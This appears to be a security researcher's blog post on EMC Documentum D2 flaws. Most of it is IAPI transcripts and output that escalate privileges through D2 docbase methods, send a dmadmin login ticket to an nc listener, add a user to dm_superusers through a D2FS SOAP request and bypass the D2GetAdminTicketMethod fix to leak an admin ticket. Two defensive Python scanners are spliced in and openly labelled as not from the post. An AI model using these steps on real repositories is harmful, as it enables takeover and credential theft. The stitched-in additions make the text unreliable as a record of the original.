Second dive into D2 security

Read the previous one.

D2UpdateChildACLMethod

API> retrieve,c,dm_acl where object_name='dm_acl_superusers'
...
45022483800001bc
API> dump,c,45022483800001bc
...
USER ATTRIBUTES

  object_name                     : dm_acl_superusers
  description                     : ACL of superusers used for Docbase Administration
  owner_name                      : d2
  globally_managed                : F
  acl_class                       : 0

SYSTEM ATTRIBUTES

  r_is_internal                   : F
  r_accessor_name              [0]: dm_world
                               [1]: dm_owner
                               [2]: admingroup
  r_accessor_permit            [0]: 1
                               [1]: 7
                               [2]: 7
  r_accessor_xpermit           [0]: 0
                               [1]: 0
                               [2]: 0
  r_is_group                   [0]: F
                               [1]: F
                               [2]: T
  r_has_events                    : F
  r_permit_type                [0]: 0
                               [1]: 0
                               [2]: 0
  r_application_permit         [0]:
                               [1]:
                               [2]:
  r_template_id                   : 0000000000000000
  r_alias_set_id                  : 0000000000000000
  r_object_id                     : 45022483800001bc

APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES

  i_has_required_groups           : F
  i_has_required_group_set        : F
  i_has_access_restrictions       : F
  i_partition                     : 0
  i_is_replica                    : F
  i_vstamp                        : 0

API> retrieve,c,dm_method where object_name='dm_GroupRename'
...
[DM_API_E_NO_MATCH]error:  
   "There was no match in the docbase for the qualification: 
      dm_method where object_name='dm_GroupRename'"

API> create,c,d2_acl_config
...
000224838000012b
API> set,c,l,object_name
SET> ACL of superusers used for Docbase Administration
...
OK
API> append,c,l,accessor_name
SET> dm_world
...
OK
API> append,c,l,condition_attr_name
SET>
...
OK
API> append,c,l,condition_attr_value
SET>
...
OK
API> append,c,l,accessor_permit
SET> 7
...
OK
API> append,c,l,accessor_xpermit
SET> 0
...
OK
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,D2UpdateChildACLMethod,
     ARGUMENTS,S,'
       -docbase_name d2 
       -password "" 
       -acl_config_name "ACL of superusers used for Docbase Administration"
     '
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> close,c,q0
...
OK
API> retrieve,c,dm_method where object_name='dm_GroupRename'
...
100224838000056e
API> get,c,l,_permit
...
7

D2RefreshCacheMethod

nc:

nc -l 7777

api:

API> create,c,d2_options
...
000224838000012c
API> append,c,l,client_urls
SET> http://localhost:7777/
...
OK
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,D2RefreshCacheMethod,
     ARGUMENTS,S,'-docbase_name d2 -password "" -all true',SAVE_RESULTS,B,T
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0902248380002c87
  result_doc_id                   : 0902248380002c87
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> getpath,c,0902248380002c87
...
/u01/documentum/cs/data/d2/content_storage_01/00022483/80/00/0a/b6.txt
API> quit
Bye
 ~]$ cat content_storage_01/00022483/80/00/0a/b6.txt
==== START ======================================================================
...............
Refresh cache URL http://localhost:7777/servlet/..._password=DM_TICKET%3DT0...

nc:

GET /servlet/RefreshCache?_docbase=d2&_username=dmadmin&_password=DM_TICKET%3DT0... HTTP/1.1
User-Agent: Java/1.7.0_51
Host: localhost:7777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

D2WF{LaunchScheduledWorkflows, LifeCycle, ReceiveTaskMail, SendTaskMail}Method

If we execute the method with SAVE_RESULTS=T, we get the user's ticket in the result document:

==== START =======================================================
D2-API v4.2.0010 build 378
DFC version : 7.1.0020.0120
file.encoding : UTF-8
Arguments : ...
User  : d2_mail_manager
Domain  :
User password : DM_TICKET=T0JKIE5VTEwgMAoxMwp2ZXJzaW9u...
New session manager creation.
Session manager set identity.
Session manager get session.
Tasks found : 0
==== END (0.166s) ================================================
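The two outputs above (the SAVE_RESULTS content file with its "User password : DM_TICKET=..." line, and the refresh-cache URL carrying "_password=DM_TICKET%3D...") are the places a defender should be watching for leaked tickets. The following scanner is an added example, not code from the post or from EMC: it walks method output, reports the line numbers that carry a DM_TICKET and returns only redacted copies, so the report itself does not re-leak the credential. The sample text is constructed to mirror the formats shown above; the ticket values in it are placeholders, and the regular expression assumes tickets are base64-like strings that may be URL-encoded.

```python
import re
from typing import List, Tuple

# A DM_TICKET credential as it appears in D2 method output: either a plain
# "DM_TICKET=..." (SAVE_RESULTS content file) or a URL-encoded "DM_TICKET%3D..."
# inside a refresh-cache URL. The trailing "..." of a truncated ticket is
# absorbed too, so nothing of the value survives redaction.
TICKET_RE = re.compile(r"DM_TICKET(?:=|%3D)[A-Za-z0-9+/=%._-]+")

REDACTED = "DM_TICKET=<redacted>"


def find_leaked_tickets(text: str) -> List[Tuple[int, str]]:
    """Return (line number, redacted line) for every line carrying a DM_TICKET.

    The ticket itself is never returned, so the result can go straight into an
    alert or a review note without copying the credential around.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if TICKET_RE.search(line):
            findings.append((lineno, TICKET_RE.sub(REDACTED, line)))
    return findings


def redact_tickets(text: str) -> str:
    """Return the whole text with every DM_TICKET replaced, e.g. before a
    SAVE_RESULTS content file is archived or a method log is forwarded."""
    return TICKET_RE.sub(REDACTED, text)


# Constructed sample in the shape of the method output shown above; the
# ticket values are placeholders, not real tickets.
SAMPLE_METHOD_OUTPUT = """\
==== START =======================================================
D2-API v4.2.0010 build 378
User  : d2_mail_manager
User password : DM_TICKET=T0JKIE5VTEwgMAoxMwpFWEFNUExF...
Refresh cache URL http://localhost:7777/servlet/RefreshCache?_docbase=d2&_username=dmadmin&_password=DM_TICKET%3DT0JKIE5VTEwgRVhBTVBMRQ...
Tasks found : 0
==== END (0.166s) ================================================
"""

if __name__ == "__main__":
    for lineno, line in find_leaked_tickets(SAMPLE_METHOD_OUTPUT):
        print(f"line {lineno}: {line}")
```

Run against the content_storage files produced by SAVE_RESULTS (the getpath output above shows where they live) or against the method server log; any hit means a ticket has been written to disk and the file should be treated as a credential.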

D2FS

api:

API> retrieve,c,dm_user where user_name='hacker'
...
1102248380000541
API> retrieve,c,d2_options
...
000224838000012c
API> dump,c,l
...
USER ATTRIBUTES

  config_security_group           :
  client_security_group           :
  node_admin_security_group       : admingroup
  forbidden_copy                []: <none>
  client_urls                   []: <none>
  enable_compare                  : F
  attribute_list_display_mode     : 0
  node_user_security_group        : admingroup
  node_group_security_group       : admingroup
  node_group_user_parent          : node_admin
  node_group_display_all          : T
  dfc_validator                   : T
  in_create_config              []: <none>
  url_allowed_actions           []: <none>
  lock_config                     : F

SYSTEM ATTRIBUTES

  r_object_id                     : 000224838000012c

APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES

  i_is_replica                    : F
  i_vstamp                        : 2

API> set,c,l,node_user_security_group
SET>
...
OK
API> save,c,l
...
OK

soap:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
           xmlns:con="http://www.emc.com/d2fs/services/content_service"
           xmlns:com="http://www.emc.com/d2fs/models/common"
           xmlns:prop="http://www.emc.com/d2fs/services/property_service" 
           xmlns:att="http://www.emc.com/d2fs/models/attribute"
           xmlns:con1="http://www.emc.com/d2fs/models/context">
   <soapenv:Header/>
   <soapenv:Body>
      <prop:savePropertiesRequest com:id="1102248380000541" >
         <con1:context uid="2" login="hacker" password="hacker">
                <con1:repository com:id="2" repositoryName="d2" serverVersion="7"
                                 repositoryType="DOCUMENTUM" hideDomain="true"/>
            </con1:context>
         <!--Zero or more repetitions:-->
         <att:attributes name="list" type="2" value="group_membership" />
         <att:attributes name="user_group_name" type="2" value="dm_superusers" />
      </prop:savePropertiesRequest>
   </soapenv:Body>
</soapenv:Envelope>

api:

API> retrieve,c,dm_group where group_name='dm_superusers'
...
1202248380000101
API> dump,c,l
...
USER ATTRIBUTES

  group_name                      : dm_superusers
  group_address                   :
  users_names                  [0]: hacker
  groups_names                 [0]: dm_superusers_dynamic
                               [1]: dcs_privileged_users
  owner_name                      : d2
  is_private                      : F
  description                     :
  globally_managed                : F
  alias_set_id                    : 0000000000000000
  group_source                    :
  group_class                     : privilege group
  group_admin                     :
  is_dynamic                      : F
  is_dynamic_default              : F
  group_global_unique_id          : d2:dm_superusers
  group_native_room_id            : 0000000000000000
  group_directory_id              : 0000000000000000
  group_display_name              : dm_superusers
  is_protected                    : F
  is_module_only                  : F

SYSTEM ATTRIBUTES

  r_modify_date                   : 4/19/2014 22:54:42
  r_has_events                    : F
  r_object_id                     : 1202248380000101

APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES

  i_all_users_names            [0]: hacker
  i_supergroups_names          [0]: dm_superusers
  i_nondyn_supergroups_names   [0]: dm_superusers
  i_is_replica                    : F
  i_vstamp                        : 4
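The dumps above show the condition that made the savePropertiesRequest succeed: node_user_security_group in d2_options was emptied before the request, and afterwards "hacker" sits in users_names of dm_superusers. An administrator can catch that state from a plain IAPI dump. The following audit is an added example, not code from the post or from EMC: it parses the dump listing format used throughout this post (single-valued "name : value", repeating "name [0]: value" with "[1]:" continuations, and "name []: <none>") and flags every *_security_group attribute that is empty, plus every client_urls entry, since that is where the refresh-cache request carrying a ticket is sent. The attribute names come from the d2_options dump above; the sample dump is constructed; that an empty value means "unrestricted" for the groups other than node_user_security_group is an assumption to verify, the post only demonstrates node_user_security_group.

```python
import re
from typing import Dict, List, Union

# One attribute line of an IAPI "dump" listing:
#   name                : value          single-valued attribute
#   name             [0]: value          first value of a repeating attribute
#                    [1]: value          continuation of the same attribute
#   name              []: <none>         repeating attribute with no values
ATTR_RE = re.compile(
    r"^\s*(?P<name>[A-Za-z_]\w*)?\s*(?P<idx>\[\d*\])?\s*:\s?(?P<value>.*)$"
)

Attrs = Dict[str, Union[str, List[str]]]


def parse_dump(text: str) -> Attrs:
    """Parse the attribute lines of a dump; headers, prompts and blanks are skipped."""
    attrs: Attrs = {}
    current = None
    for line in text.splitlines():
        m = ATTR_RE.match(line)
        if not m or (m.group("name") is None and m.group("idx") is None):
            continue
        name, idx, value = m.group("name"), m.group("idx"), m.group("value").rstrip()
        if name is not None:
            current = name
            if idx is None:
                attrs[current] = value      # single-valued attribute
                continue
            attrs[current] = []             # start of a repeating attribute
        if current is None or not isinstance(attrs.get(current), list):
            continue                        # continuation without a list to join
        if idx == "[]" and value == "<none>":
            continue                        # empty repeating attribute
        attrs[current].append(value)
    return attrs


# d2_options attributes naming the group allowed through a D2FS path (names
# taken from the dump above). node_user_security_group is the one the post
# shows being emptied; the others are checked on the assumption that an empty
# value removes the restriction for them as well.
SECURITY_GROUP_ATTRS = (
    "config_security_group",
    "client_security_group",
    "node_admin_security_group",
    "node_user_security_group",
    "node_group_security_group",
)


def audit_d2_options(dump_text: str) -> List[str]:
    """Return one finding per empty security group and per client_urls entry."""
    attrs = parse_dump(dump_text)
    findings = []
    for name in SECURITY_GROUP_ATTRS:
        value = attrs.get(name, "")
        if isinstance(value, str) and not value.strip():
            findings.append(f"{name} is empty")
    urls = attrs.get("client_urls", [])
    for url in urls if isinstance(urls, list) else []:
        findings.append(f"client_urls contains {url}")
    return findings


# Constructed sample: the d2_options object after node_user_security_group
# was cleared and a client URL was appended, in the dump format shown above.
SAMPLE_D2_OPTIONS_DUMP = """\
USER ATTRIBUTES

  config_security_group           :
  client_security_group           :
  node_admin_security_group       : admingroup
  forbidden_copy                []: <none>
  client_urls                  [0]: http://localhost:7777/
  enable_compare                  : F
  node_user_security_group        :
  node_group_security_group       : admingroup
  lock_config                     : F

SYSTEM ATTRIBUTES

  r_object_id                     : 000224838000012c
"""

if __name__ == "__main__":
    for finding in audit_d2_options(SAMPLE_D2_OPTIONS_DUMP):
        print(finding)
```

The same parser works on the dm_superusers dump: parse_dump(...)["users_names"] gives the direct members, so a periodic comparison of that list against an expected baseline would have surfaced the new member at the same time.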

Is it worth treating the flu if the patient has cancer?

Here I described a vulnerability in the D2GetAdminTicketMethod docbase method. After that, EMC released D2 4.2, where they started encrypting the return values passed through the c6_method_return object, but their solution was still vulnerable. Now, in D2 4.2.1, they have decided to treat the symptoms instead of raising the technology level of D2. Note that the security advisory is still not published:

which, according to the statements provided above, means that EMC does not “want to inform customers about a new or updated recommendation on security best practices”.

Fortunately, EMC's coders neither know the product they are developing nor read its documentation. Watch my hands:

API> create,c,c6_method_return
...
000224838000011f
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,D2GetAdminTicketMethod,
     ARGUMENTS,S,'
       -docbase_name d2 
       -password "" 
       -method_return_id 000224838000011f 
       -scope global 
       -timeout 3600
     '
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> close,c,q0
...
OK
API> revert,c,000224838000011f
...
OK
API> get,c,000224838000011f,message
...
API> ?,c,update c6_method_return object 
     set parameter_name[0]='-timeout', 
     set parameter_value[0]=(select message from c6_method_return 
        where r_object_id='000224838000011f') 
     where r_object_id='000224838000011f'
objects_updated
---------------
              1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info:  "1 objects were affected by your UPDATE statement."


API> apply,c,,DO_METHOD,METHOD,S,D2GetAdminTicketMethod,
     ARGUMENTS,S,'
        -docbase_name d2 
        -password "" 
        -method_return_id 000224838000011f 
        -scope global -timeout 3600
     ',
     SAVE_RESULTS,B,T
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0902248380002a67
  result_doc_id                   : 0902248380002a67
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> close,c,q0
...
OK
API> get,c,000224838000011f,message
...
API> get,c,000224838000011f,error
...

API> getpath,c,0902248380002a67
...
/u01/documentum/cs/data/d2/content_storage_01/00022483/80/00/09/e1.txt
API> quit
Bye
 ~]$ cat content_storage_01/00022483/80/00/09/e1.txt
==== START =======================================================
D2-API v4.2.0010 build 378
DFC version : 7.1.0020.0120
file.encoding : UTF-8
Arguments : {-docbase_name=d2, 
    -method_return_id=000224838000011f, 
    -password=, 
    -class_name=com.emc.d2.api.methods.D2GetAdminTicketMethod, 
    -scope=global,
    -timeout=DM_TICKET=T0JKIE5VTEwgMAoxMwp....
}
-Scope : global
-TimeOut : 3600
D2Method.passphrase MD5 : default
-SingleUse : true
D2Method.passphrase MD5 : default
==== END (0.095s) ================================================

This is already the second attempt to fix the D2GetAdminTicketMethod vulnerability, and the fix is still incomplete and wrong. What a shame: EMC can't fix a high-severity vulnerability in 5 months.

About restricted folders

On April 10, 2014 EMC announced CVE-2014-0642:

EMC Documentum Content Server may be vulnerable to an information disclosure vulnerability that may potentially be exploited by malicious users to gain unauthorized access to metadata. This is due to improper authorization checks being performed when trying to access metadata from folders outside of restricted folders configured for Content Server users. This vulnerability is only limited to reading the metadata as the malicious user is not able to gain read/write access to the content itself.

The researcher of this vulnerability is Yuri Simione, who is even going to publish an “exploit” (it took me 10 minutes to understand how to exploit the vulnerability, but I’m not going to publish any related information). Initially I was confused by the following: Yuri writes that he discovered the vulnerability in January 2014, and EMC has written that the vulnerability is fixed in CS7.1SP2 (released on March 1, 2014), so it took just one month to fix the vulnerability (note that using the restricted folders feature causes wrong results for some queries). EMC has been trying to fix multiple XSRFs for more than a year and still has no success; the privilege escalation vulnerabilities I discovered in November 2013 are still not fixed, but low-impact vulnerabilities are worth fixing within a month. What a shame!